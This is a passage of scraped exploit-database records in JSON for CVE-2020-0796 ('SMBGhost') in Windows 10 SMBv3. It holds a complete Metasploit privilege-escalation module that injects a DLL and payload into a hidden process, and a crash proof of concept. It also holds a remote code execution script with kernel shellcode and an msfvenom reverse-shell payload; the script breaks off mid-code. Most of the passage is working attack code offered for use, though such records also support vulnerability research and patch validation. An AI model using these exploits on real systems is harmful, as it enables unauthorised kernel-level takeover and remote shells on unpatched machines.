"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-04-06T00:00:00", "id": "1337DAY-ID-34206", "href": "https://0day.today/exploit/description/34206", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'SMBv3 Compression Buffer Overflow',\n 'Description' => %q{\n A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit\n 'Manuel Blanco Paraj\u00f3n', # original LPE exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' =>\n [\n #[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n [ 'CVE', '2020-0796' ],\n [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]\n ],\n 'DisclosureDate' => '2020-03-13',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'SMBGhost', 'CoronaBlue' ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n }))\n end\n\n def check\n sysinfo_value = sysinfo[\"OS\"]\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)\n print_error('The exploit only supports Windows 10 versions 1903 - 1909')\n return CheckCode::Safe\n end\n\n disable_compression = registry_getvaldata(\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\",\"DisableCompression\")\n if !disable_compression.nil? && disable_compression != 0\n print_error('The exploit requires compression to be enabled')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo[\"Architecture\"] =~ /wow64/i\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Reader Sandbox won't allow to create a new process:\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/34206", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:09:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "Microsoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34097", "href": "https://0day.today/exploit/description/34097", "sourceData": "\nMicrosoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)\n\n\n# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip\n\n## Usage\n\n`./CVE-2020-0796.py servername`\n\nThis script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.\n\nThis contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.\n\nThe compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.\n\n```python\n def _compress(self, b_data, session):\n header = SMB2CompressionTransformHeader()\n header['original_size'] = len(b_data)\n header['offset'] = 4294967295\n header['data'] = smbprotocol.lznt1.compress(b_data)\n```\n\n## About\n\nCVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).\n\nOnce a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.\n\nCVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.\n", "sourceHref": "https://0day.today/exploit/34097", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:56:49", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-02T00:00:00", "type": "zdt", "title": "Microsoft Windows - (SMBGhost) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-02T00:00:00", "id": "1337DAY-ID-34504", "href": "https://0day.today/exploit/description/34504", "sourceData": "#!/usr/bin/env python\n'''\n# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip\n\n# SMBGhost_RCE_PoC\n\nRCE PoC for CVE-2020-0796 \"SMBGhost\"\n\nFor demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. \n\nNow that that's out of the way....\n\nUsage ex: \n\n``` \n$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131\n[+] found low stub at phys addr 13000!\n[+] PML4 at 1ad000\n[+] base of HAL heap at fffff79480000000\n[+] ntoskrnl entry at fffff80645792010\n[+] found PML4 self-ref entry 1eb\n[+] found HalpInterruptController at fffff79480001478\n[+] found HalpApicRequestInterrupt at fffff80645cb3bb0\n[+] built shellcode!\n[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000\n[+] KUSER_SHARED_DATA PTE NX bit cleared!\n[+] Wrote shellcode at fffff78000000a00!\n[+] Press a key to execute shellcode!\n[+] overwrote HalpInterruptController pointer, should have execution shortly...\n```\n\nReplace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. \n\nlznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a \"bad compression\" function to corrupt SRVNET buffer\nheader without causing a crash.\n\nSee this excellent write up by Ricera Security for more details on the methods I used: \nhttps://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html\n'''\n\nimport sys\nimport socket\nimport struct\nimport argparse\n\nfrom lznt1 import compress, compress_evil\nfrom smb_win import smb_negotiate, smb_compress\n\n# Use lowstub jmp bytes to signature search\nLOWSTUB_JMP = 0x1000600E9\n# Offset of PML4 pointer in lowstub\nPML4_LOWSTUB_OFFSET = 0xA0\n# Offset of lowstub virtual address in lowstub\nSELFVA_LOWSTUB_OFFSET = 0x78\n# Offset of NTOSKRNL entry address in lowstub\nNTENTRY_LOWSTUB_OFFSET = 0x278\n\n# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController\nHALP_APIC_REQ_INTERRUPT_OFFSET = 0x78\n\nKUSER_SHARED_DATA = 0xFFFFF78000000000\n\n# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR\nPNET_RAW_BUFF_OFFSET = 0x18\n# Offset of pMDL1 in SRVNET_BUFFER_HDR\nPMDL1_OFFSET = 0x38\n\n# Shellcode from kernel_shellcode.asm\n\nKERNEL_SHELLCODE = b\"\\x41\\x50\\x41\\x51\\x41\\x55\\x41\\x57\\x41\\x56\\x51\\x52\\x53\\x56\\x57\\x4C\"\nKERNEL_SHELLCODE += b\"\\x8D\\x35\\xA0\\x02\\x00\\x00\\x49\\x8B\\x86\\xD0\\x00\\x00\\x00\\x49\\x8B\\x9E\"\nKERNEL_SHELLCODE += b\"\\xD8\\x00\\x00\\x00\\x48\\x89\\x18\\xFB\\x49\\x8B\\x86\\xE0\\x00\\x00\\x00\\x48\"\nKERNEL_SHELLCODE += b\"\\x2D\\x00\\x10\\x00\\x00\\x66\\x81\\x38\\x4D\\x5A\\x75\\xF3\\x49\\x89\\xC7\\x4D\"\nKERNEL_SHELLCODE += b\"\\x89\\xBE\\xE0\\x00\\x00\\x00\\xBF\\x78\\x7C\\xF4\\xDB\\xE8\\xDA\\x00\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x49\\x89\\xC5\\xBF\\x3F\\x5F\\x64\\x77\\xE8\\x2E\\x01\\x00\\x00\\x48\\x89\\xC1\"\nKERNEL_SHELLCODE += b\"\\xBF\\xE1\\x14\\x01\\x17\\xE8\\x21\\x01\\x00\\x00\\x48\\x89\\xC2\\x48\\x83\\xC2\"\nKERNEL_SHELLCODE += b\"\\x08\\x49\\x8D\\x74\\x0D\\x00\\xE8\\xFF\\x00\\x00\\x00\\x3D\\xD8\\x83\\xE0\\x3E\"\nKERNEL_SHELLCODE += b\"\\x74\\x0A\\x4D\\x8B\\x6C\\x15\\x00\\x49\\x29\\xD5\\xEB\\xE5\\xBF\\x48\\xB8\\x18\"\nKERNEL_SHELLCODE += b\"\\xB8\\x4C\\x89\\xE9\\xE8\\x91\\x00\\x00\\x00\\x49\\x89\\x06\\x4D\\x8B\\x4D\\x30\"\nKERNEL_SHELLCODE += b\"\\x4D\\x8B\\x45\\x38\\x49\\x81\\xE8\\xF8\\x02\\x00\\x00\\x48\\x31\\xF6\\x49\\x81\"\nKERNEL_SHELLCODE += b\"\\xE9\\xF8\\x02\\x00\\x00\\x41\\x8B\\x79\\x74\\x0F\\xBA\\xE7\\x04\\x73\\x05\\x4C\"\nKERNEL_SHELLCODE += b\"\\x89\\xCE\\xEB\\x0C\\x4D\\x39\\xC8\\x4D\\x8B\\x89\\xF8\\x02\\x00\\x00\\x75\\xDE\"\nKERNEL_SHELLCODE += b\"\\x48\\x85\\xF6\\x74\\x40\\x49\\x8D\\x4E\\x08\\x48\\x89\\xF2\\x4D\\x31\\xC0\\x4C\"\nKERNEL_SHELLCODE += b\"\\x8D\\x0D\\xB9\\x00\\x00\\x00\\x52\\x41\\x50\\x41\\x50\\x41\\x50\\xBF\\xC4\\x5C\"\nKERNEL_SHELLCODE += b\"\\x19\\x6D\\x48\\x83\\xEC\\x20\\xE8\\x2F\\x00\\x00\\x00\\x48\\x83\\xC4\\x40\\x49\"\nKERNEL_SHELLCODE += b\"\\x8D\\x4E\\x08\\xBF\\x34\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xE8\\x19\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x48\\x83\\xC4\\x20\\xFA\\x48\\x89\\xD8\\x5F\\x5E\\x5B\\x5A\\x59\\x41\\x5E\"\nKERNEL_SHELLCODE += b\"\\x41\\x5F\\x41\\x5D\\x41\\x59\\x41\\x58\\xFF\\xE0\\xE8\\x02\\x00\\x00\\x00\\xFF\"\nKERNEL_SHELLCODE += b\"\\xE0\\x53\\x51\\x56\\x41\\x8B\\x47\\x3C\\x4C\\x01\\xF8\\x8B\\x80\\x88\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x4C\\x01\\xF8\\x50\\x8B\\x48\\x18\\x8B\\x58\\x20\\x4C\\x01\\xFB\\xFF\\xC9\"\nKERNEL_SHELLCODE += b\"\\x8B\\x34\\x8B\\x4C\\x01\\xFE\\xE8\\x1F\\x00\\x00\\x00\\x39\\xF8\\x75\\xEF\\x58\"\nKERNEL_SHELLCODE += b\"\\x8B\\x58\\x24\\x4C\\x01\\xFB\\x66\\x8B\\x0C\\x4B\\x8B\\x58\\x1C\\x4C\\x01\\xFB\"\nKERNEL_SHELLCODE += b\"\\x8B\\x04\\x8B\\x4C\\x01\\xF8\\x5E\\x59\\x5B\\xC3\\x52\\x31\\xC0\\x99\\xAC\\xC1\"\nKERNEL_SHELLCODE += b\"\\xCA\\x0D\\x01\\xC2\\x85\\xC0\\x75\\xF6\\x92\\x5A\\xC3\\xE8\\xA1\\xFF\\xFF\\xFF\"\nKERNEL_SHELLCODE += b\"\\x80\\x78\\x02\\x80\\x77\\x05\\x0F\\xB6\\x40\\x03\\xC3\\x8B\\x40\\x03\\xC3\\x41\"\nKERNEL_SHELLCODE += b\"\\x57\\x41\\x56\\x57\\x56\\x48\\x8B\\x05\\x0A\\x01\\x00\\x00\\x48\\x8B\\x48\\x18\"\nKERNEL_SHELLCODE += b\"\\x48\\x8B\\x49\\x20\\x48\\x8B\\x09\\x66\\x83\\x79\\x48\\x18\\x75\\xF6\\x48\\x8B\"\nKERNEL_SHELLCODE += b\"\\x41\\x50\\x81\\x78\\x0C\\x33\\x00\\x32\\x00\\x75\\xE9\\x4C\\x8B\\x79\\x20\\xBF\"\nKERNEL_SHELLCODE += b\"\\x5E\\x51\\x5E\\x83\\xE8\\x58\\xFF\\xFF\\xFF\\x49\\x89\\xC6\\x4C\\x8B\\x3D\\xB3\"\nKERNEL_SHELLCODE += b\"\\x01\\x00\\x00\\x31\\xC0\\x44\\x0F\\x22\\xC0\\x48\\x8D\\x15\\x8E\\x01\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x89\\xC1\\x48\\xF7\\xD1\\x49\\x89\\xC0\\xB0\\x40\\x50\\xC1\\xE0\\x06\\x50\\x49\"\nKERNEL_SHELLCODE += b\"\\x89\\x01\\x48\\x83\\xEC\\x20\\xBF\\xEA\\x99\\x6E\\x57\\xE8\\x1A\\xFF\\xFF\\xFF\"\nKERNEL_SHELLCODE += b\"\\x48\\x83\\xC4\\x30\\x48\\x8B\\x3D\\x63\\x01\\x00\\x00\\x48\\x8D\\x35\\x77\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x00\\xB9\\x1D\\x00\\x00\\x00\\xF3\\xA4\\x48\\x8D\\x35\\x6E\\x01\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\xB9\\x58\\x02\\x00\\x00\\xF3\\xA4\\x48\\x8D\\x0D\\xD8\\x00\\x00\\x00\\x65\\x48\"\nKERNEL_SHELLCODE += b\"\\x8B\\x14\\x25\\x88\\x01\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x8D\\x0D\\x46\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x41\\x50\\x6A\\x01\\x48\\x8B\\x05\\x22\\x01\\x00\\x00\\x50\\x41\\x50\\x48\"\nKERNEL_SHELLCODE += b\"\\x83\\xEC\\x20\\xBF\\xC4\\x5C\\x19\\x6D\\xE8\\xBD\\xFE\\xFF\\xFF\\x48\\x83\\xC4\"\nKERNEL_SHELLCODE += b\"\\x40\\x48\\x8D\\x0D\\x9E\\x00\\x00\\x00\\x4C\\x89\\xF2\\x4D\\x31\\xC9\\xBF\\x34\"\nKERNEL_SHELLCODE += b\"\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xE8\\x9E\\xFE\\xFF\\xFF\\x48\\x83\\xC4\\x20\"\nKERNEL_SHELLCODE += b\"\\x5E\\x5F\\x41\\x5E\\x41\\x5F\\xC3\\x90\\xC3\\x48\\x92\\x31\\xC9\\x51\\x51\\x49\"\nKERNEL_SHELLCODE += b\"\\x89\\xC9\\x4C\\x8D\\x05\\x0D\\x00\\x00\\x00\\x89\\xCA\\x48\\x83\\xEC\\x20\\xFF\"\nKERNEL_SHELLCODE += b\"\\xD0\\x48\\x83\\xC4\\x30\\xC3\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?\n\nUSER_PAYLOAD = b\"\"\nUSER_PAYLOAD += b\"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\"\nUSER_PAYLOAD += b\"\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\"\nUSER_PAYLOAD += b\"\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\"\nUSER_PAYLOAD += b\"\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\"\nUSER_PAYLOAD += b\"\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\"\nUSER_PAYLOAD += b\"\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\"\nUSER_PAYLOAD += b\"\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\"\nUSER_PAYLOAD += b\"\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\"\nUSER_PAYLOAD += b\"\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\"\nUSER_PAYLOAD += b\"\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\"\nUSER_PAYLOAD += b\"\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\"\nUSER_PAYLOAD += b\"\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\"\nUSER_PAYLOAD += b\"\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\"\nUSER_PAYLOAD += b\"\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\"\nUSER_PAYLOAD += b\"\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\nUSER_PAYLOAD += b\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\"\nUSER_PAYLOAD += b\"\\x5f\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\"\nUSER_PAYLOAD += b\"\\xa0\\x01\\x00\\x00\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x7a\\x69\"\nUSER_PAYLOAD += b\"\\xc0\\xa8\\x8e\\x01\\x41\\x54\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\"\nUSER_PAYLOAD += b\"\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\\x89\\xea\\x68\\x01\\x01\"\nUSER_PAYLOAD += b\"\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\"\nUSER_PAYLOAD += b\"\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\\x48\"\nUSER_PAYLOAD += b\"\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\"\nUSER_PAYLOAD += b\"\\x48\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\"\nUSER_PAYLOAD += b\"\\x41\\xba\\x99\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81\\xc4\\x40\\x02\"\nUSER_PAYLOAD += b\"\\x00\\x00\\x49\\xb8\\x63\\x6d\\x64\\x00\\x00\\x00\\x00\\x00\\x41\"\nUSER_PAYLOAD += b\"\\x50\\x41\\x50\\x48\\x89\\xe2\\x57\\x57\\x57\\x4d\\x31\\xc0\\x6a\"\nUSER_PAYLOAD += b\"\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\\x24\\x54\\x01\\x01\"\nUSER_PAYLOAD += b\"\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\\x56\\x50\"\nUSER_PAYLOAD += b\"\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\"\nUSER_PAYLOAD += b\"\\xc8\\x4d\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\"\nUSER_PAYLOAD += b\"\\xff\\xd5\\x48\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\"\nUSER_PAYLOAD += b\"\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\"\nUSER_PAYLOAD += b\"\\x95\\xbd\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\"\nUSER_PAYLOAD += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\"\nUSER_PAYLOAD += b\"\\x41\\x89\\xda\\xff\\xd5\"\n\n\nPML4_SELFREF = 0\nPHAL_HEAP = 0\nPHALP_INTERRUPT = 0\nPHALP_APIC_INTERRUPT = 0\nPNT_ENTRY = 0\n\nmax_read_retry = 3\noverflow_val = 0x1100\nwrite_unit = 0xd0\npmdl_va = KUSER_SHARED_DATA + 0x900\npmdl_mapva = KUSER_SHARED_DATA + 0x800\npshellcodeva = KUSER_SHARED_DATA + 0xa00\n\n\nclass MDL:\n def __init__(self, map_va, phys_addr):\n self.next = struct.pack(\"<Q\", 0x0)\n self.size = struct.pack(\"<H\", 0x40)\n self.mdl_flags = struct.pack(\"<H\", 0x5004)\n self.alloc_processor = struct.pack(\"<H\", 0x0)\n self.reserved = struct.pack(\"<H\", 0x0)\n self.process = struct.pack(\"<Q\", 0x0)\n self.map_va = struct.pack(\"<Q\", map_va)\n map_va &= ~0xFFF\n self.start_va = struct.pack(\"<Q\", map_va)\n self.byte_count = struct.pack(\"<L\", 0x1100)\n self.byte_offset = struct.pack(\"<L\", (phys_addr & 0xFFF) + 0x4)\n phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12\n self.phys_addr1 = struct.pack(\"<Q\", phys_addr_enc)\n self.phys_addr2 = struct.pack(\"<Q\", phys_addr_enc)\n self.phys_addr3 = struct.pack(\"<Q\", phys_addr_enc)\n\n 